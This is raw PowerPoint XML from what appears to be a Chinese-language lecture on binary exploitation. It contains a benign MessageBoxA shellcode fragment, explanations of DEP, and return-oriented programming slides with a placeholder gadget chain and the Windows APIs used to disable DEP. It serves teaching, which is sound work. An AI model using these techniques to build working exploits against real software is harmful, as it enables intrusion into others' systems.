            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>//push "</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mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esp</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eax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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>call[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>0x04]        </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>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MessageBoxA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(NULL,"</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westwest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>",NULL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>call[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> - 0x08]        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ExitProcess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(0);</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nop</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2298808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三</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>搜索定位目标函数</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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C90E2733-EA5F-0ECA-E850-9B108B448781}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="773943" y="1052513"/>
            <a:ext cx="5111750" cy="5256212"/>
            <a:chOff x="623888" y="1052513"/>
            <a:chExt cx="5111750" cy="5256212"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="矩形 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36D4B131-9145-70B2-D459-8D1562DD0E27}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="623888"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834F9780-0674-44A0-FF7F-C80FD400A950}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="623888" y="1058913"/>
              <a:ext cx="5111750" cy="1384995"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                  <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>nop</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nop</a:t>
              </a:r>
              <a:endParaRPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                  <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>nop</a:t>
              </a:r>
              <a:endParaRPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                  <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>}</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>return</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t> 0;</a:t>
              </a:r>
              <a:endParaRPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                  <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>}</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:gr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运行结果</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3865085A-03A5-8145-D180-9522DBDD62D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6723063" y="2348880"/>
            <a:ext cx="4292600" cy="2844800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23075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返回导向编程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77617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DEP</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824536" cy="4289059"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pP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技术可以限制内存堆栈区的代码为不可执行状态，从而防范溢出后代码的执行，已经成为</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的重要保护措施，但是它依然可以被绕过。</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支持硬件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CPU</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会拒绝执行被标记为不可执行的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NX)</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内存页的代码。</a:t>
            </a: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当我们尝试在启用</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的内存执行代码，程序将会返回访问冲突</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STATUS_ACCESS_VIOLATION (0xc0000005)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并终止程序。</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776175"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DEP</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5590"/>
            <a:ext cx="4968143"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然而，考虑应用可用性，程序有时候需要在不可执行区域执行代码，所以</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Windows</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提供一些</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可以把某段不可执行区域设置为可执行。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24165828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返回导向编程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4707571"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Return-Oriented</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Programming</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824536" cy="1596014"/>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简称</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ROP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，返回导向编程，是一种基于代码复用技术的攻击，攻击者从已有的库或可执行文件中提取指令片段，构建恶意代码</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原理</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5590"/>
            <a:ext cx="4968143" cy="390433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返回导向编程借助已经存在的代码块</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也叫配件，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Gadget)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a: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这些配件来自程序已经加载的模块。</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在已经加载的模块中找到一些以</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en"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retn</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结尾的配件，把这些配件的地址布置在堆栈上</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当控制</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EIP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并返回时候</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程序就会跳去执行这些小配件。这些小配件是在别的模块代码段</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 </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不受</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的影响。</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8486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9B7E698-E5F8-969F-D864-BA6DB8AB0839}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="635000"/>
            <a:ext cx="271656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执行右侧命令后，</a:t>
            </a:r>
          </a:p>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EDX</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寄存器值为</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C4E4B54-727D-B664-1A11-FA3163F3DF6B}"/>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A0D3487-8F08-C1B8-5FA6-697775730E4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8E76C1F-F958-F8CA-07B4-58BD6B5133A5}"/>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3C5B3BEB-35AB-6C8A-904C-862C56FE2EC6}"/>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A5B8210-7740-003A-A997-BB47BEBC77AC}"/>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2" name="椭圆 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18981C6E-6F91-3C54-0184-2BAA49A2CBE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15716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3" name="椭圆 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0299D83A-B271-DF94-525C-A8071B45CD77}"/>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4" name="椭圆 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A76167C1-E125-93F9-313A-1B53AE354C61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId10"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15716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5" name="矩形: 圆角 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D128B09C-1E78-DEA9-3B3D-FD693F9072C3}"/>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5036DD7D-931C-41CB-A610-D4684CBDE0FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4007768" y="1104017"/>
            <a:ext cx="7033657" cy="1692771"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Yahei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft Yahei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ESP -&gt; ???????? =&gt; POP EAX # RETN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Yahei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft Yahei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>            0x00000001    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Yahei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft Yahei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>            ???????? =&gt; ADD EAX, 2 # RETN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Yahei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft Yahei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>            ???????? =&gt; XCHG EAX,EDX # RETN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="组合 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B88CECD-5C2F-203E-5987-831AF449CE9A}"/>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C169EF3B-D859-98A7-B761-AC34626634FE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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lorBlock">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDABAF19-5EEA-E88E-2731-95F791DF40C3}"/>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ypeText">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA437F00-602B-2D52-FBFA-F34597E27F6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a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8A3ED6C-BCD1-EB73-29D2-C9DCEC52AE9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140D408E-8C24-8607-0715-A99011BBB3A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>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94094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返回导向编程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限制条件</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824536" cy="1596014"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pP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ROP</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可以通过一些小配件构建期待的目标指令序列，但是因为它严重依赖内存中已存在的代码序列，因此，构建复杂和大规模的代码序列是非常难的。</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5590"/>
            <a:ext cx="4968143" cy="3519618"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pP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在实际应用中，基于</a:t>
            </a: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ROP</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编写的代码序列可以利用有限的编码完成下述目标来达到攻击的目的：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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25000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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 调用相关</a:t>
            </a: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API</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关闭或绕过</a:t>
            </a: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DEP</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保护。相关的</a:t>
            </a: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API</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包括</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="20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SetProcessDEPPlolicy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="e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 altLang="zh-CN" sz="20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VirtualAlloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="e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 altLang="zh-CN" sz="20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NtSetInformationProcess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="e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 altLang="zh-CN" sz="20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VirtualProtect</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等，比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" kern="0" dirty="0" err="1">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VirtualProtect</a:t>
            </a:r>
            <a:r>
              <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函数可以将内存块的属性修改为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-C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Executable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en"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2000" kern="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>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25000"/>
              </a:lnSpc>
            </a:pP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58276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返回导向编程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2573"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834F9780-0674-44A0-FF7F-C80FD400A950}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="912573" y="1705590"/>
            <a:ext cx="4824536" cy="826573"/>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2.</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实现地址跳转。直接转向不受</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保护的区域里保存的</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执行。</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7095" y="1148219"/>
            <a:ext cx="800219"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a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0048AA"/>
              </a:solidFill>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A3CBDEB-575B-00AE-A610-AD66DE4EF034}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6457095" y="1705590"/>
            <a:ext cx="4968143" cy="1211294"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pP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3.</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 调用相关</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API</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将</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shellcode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写入不受</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DEP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保护的可执行内存。进而，配合基于</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en"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ROP</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编写的地址跳转指令，完成漏洞利用。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="979914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返回导向编程</a:t>
            </a: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56161F4-766C-C824-AC32-447B970A69C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="766763" y="1058913"/>
            <a:ext cx="10658475"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A3351FC-2D6E-3C36-4889-8D64A42CEE2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4212524" y="1722013"/>
            <a:ext cx="1440160" cy="399783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57ABE7C0-7752-BE56-FB2F-D3002D77E1D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4532494" y="1368976"/>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44" name="文本框 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE0EE247-7401-9C18-9209-89E79ABAB0F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4553032" y="5745671"/>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45" name="直线连接符 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B8D88D8-888D-1D18-9E3C-F0DFDF623498}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4223792" y="211222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01BB5B5B-E026-8A7F-BDBD-7866F7D8CC80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4212522" y="248012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B023B2E-7E2D-7CD3-5997-044DB48CBF93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4223792" y="284098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EBC30912-2C27-8A73-97F5-DF752C87A8AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4223792" y="323412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DC5B1396-24BA-7F7E-A170-943AA98387F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
